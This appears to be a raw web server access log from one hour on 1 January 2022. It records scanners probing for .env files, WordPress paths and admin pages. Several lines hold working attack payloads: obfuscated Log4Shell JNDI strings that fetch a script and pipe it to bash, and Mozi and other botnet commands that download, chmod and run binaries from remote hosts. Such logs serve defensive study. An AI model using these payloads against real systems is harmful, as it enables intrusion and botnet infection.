157.245.70.127 - - [01/Jan/2022:00:02:41 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [01/Jan/2022:00:02:41 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
195.54.160.149 - - [01/Jan/2022:00:07:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.149 - - [01/Jan/2022:00:07:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
109.237.103.9 - - [01/Jan/2022:00:12:15 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
195.54.160.149 - - [01/Jan/2022:00:12:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.149 - - [01/Jan/2022:00:13:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
180.149.125.167 - - [01/Jan/2022:00:14:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
23.251.102.90 - - [01/Jan/2022:00:14:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
172.105.152.112 - - [01/Jan/2022:00:16:02 +0100] "GET /admin/index.php?login HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
109.237.103.9 - - [01/Jan/2022:00:18:23 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
128.14.141.34 - - [01/Jan/2022:00:18:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
180.149.125.165 - - [01/Jan/2022:00:18:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
180.149.125.172 - - [01/Jan/2022:00:20:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
195.54.160.149 - - [01/Jan/2022:00:21:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.149 - - [01/Jan/2022:00:21:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
221.120.100.5 - - [01/Jan/2022:00:21:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
172.105.69.5 - - [01/Jan/2022:00:26:03 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
195.54.160.149 - - [01/Jan/2022:00:26:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.180.143.8 - - [01/Jan/2022:00:26:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.8 - - [01/Jan/2022:00:26:06 +0100] "GET /fuel HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.8 - - [01/Jan/2022:00:26:07 +0100] "GET /fuel/modules/fuel/assets/css/fuel.css HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
182.123.212.153 - - [01/Jan/2022:00:26:28 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 329 "-" "-"
195.54.160.149 - - [01/Jan/2022:00:27:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:00:29:03 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.223.161.253 - - [01/Jan/2022:00:29:03 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
195.54.160.149 - - [01/Jan/2022:00:29:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
104.206.128.58 - - [01/Jan/2022:00:30:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
36.81.8.238 - - [01/Jan/2022:00:32:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
34.140.248.32 - - [01/Jan/2022:00:36:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
35.195.93.98 - - [01/Jan/2022:00:37:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
209.141.53.74 - - [01/Jan/2022:00:38:50 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
198.98.49.124 - - [01/Jan/2022:00:40:34 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
167.248.133.59 - - [01/Jan/2022:00:40:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.59 - - [01/Jan/2022:00:40:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
195.54.160.149 - - [01/Jan/2022:00:40:47 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2LjgwOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODA6ODApfGJhc2g=} HTTP/1.1" 200 1229 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2LjgwOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODA6ODApfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2LjgwOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODA6ODApfGJhc2g=}"
198.98.49.124 - - [01/Jan/2022:00:41:46 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
88.234.165.137 - - [01/Jan/2022:00:42:19 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.46/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1" 404 306 "-" "Hello, world"
209.141.53.74 - - [01/Jan/2022:00:43:20 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
107.172.73.224 - - [01/Jan/2022:00:44:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:00 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:00 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:01 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:01 +0100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:01 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:01 +0100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:01 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:01 +0100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:01 +0100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:02 +0100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:02 +0100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:02 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:02 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:44:02 +0100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
31.56.65.243 - - [01/Jan/2022:00:45:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
195.54.160.149 - - [01/Jan/2022:00:45:51 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODY6ODApfGJhc2g=} HTTP/1.1" 200 1229 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODY6ODApfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODY6ODApfGJhc2g=}"
195.54.160.149 - - [01/Jan/2022:00:47:51 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2LjgzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODM6ODApfGJhc2g=} HTTP/1.1" 200 1229 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2LjgzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODM6ODApfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2LjgzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODM6ODApfGJhc2g=}"
82.193.66.170 - - [01/Jan/2022:00:49:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
180.149.125.171 - - [01/Jan/2022:00:50:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
195.54.160.149 - - [01/Jan/2022:00:50:59 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg1OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODU6ODApfGJhc2g=} HTTP/1.1" 200 1229 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg1OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODU6ODApfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg1OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODU6ODApfGJhc2g=}"
195.54.160.149 - - [01/Jan/2022:00:50:59 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODk6ODApfGJhc2g=} HTTP/1.1" 200 1229 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODk6ODApfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODk6ODApfGJhc2g=}"
195.54.160.149 - - [01/Jan/2022:00:51:15 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODQ6ODApfGJhc2g=} HTTP/1.1" 200 1229 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODQ6ODApfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuOTEuMjQ2Ljg0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzIxMi45MS4yNDYuODQ6ODApfGJhc2g=}"
107.172.73.224 - - [01/Jan/2022:00:57:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:33 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:33 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:34 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:34 +0100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:34 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:34 +0100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:34 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:34 +0100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:34 +0100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:34 +0100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:35 +0100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:35 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:35 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:57:35 +0100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
198.98.49.124 - - [01/Jan/2022:00:58:54 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
107.172.73.224 - - [01/Jan/2022:00:58:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:56 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:56 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:56 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:56 +0100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:56 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:56 +0100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:56 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:57 +0100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:57 +0100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
107.172.73.224 - - [01/Jan/2022:00:58:57 +0100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
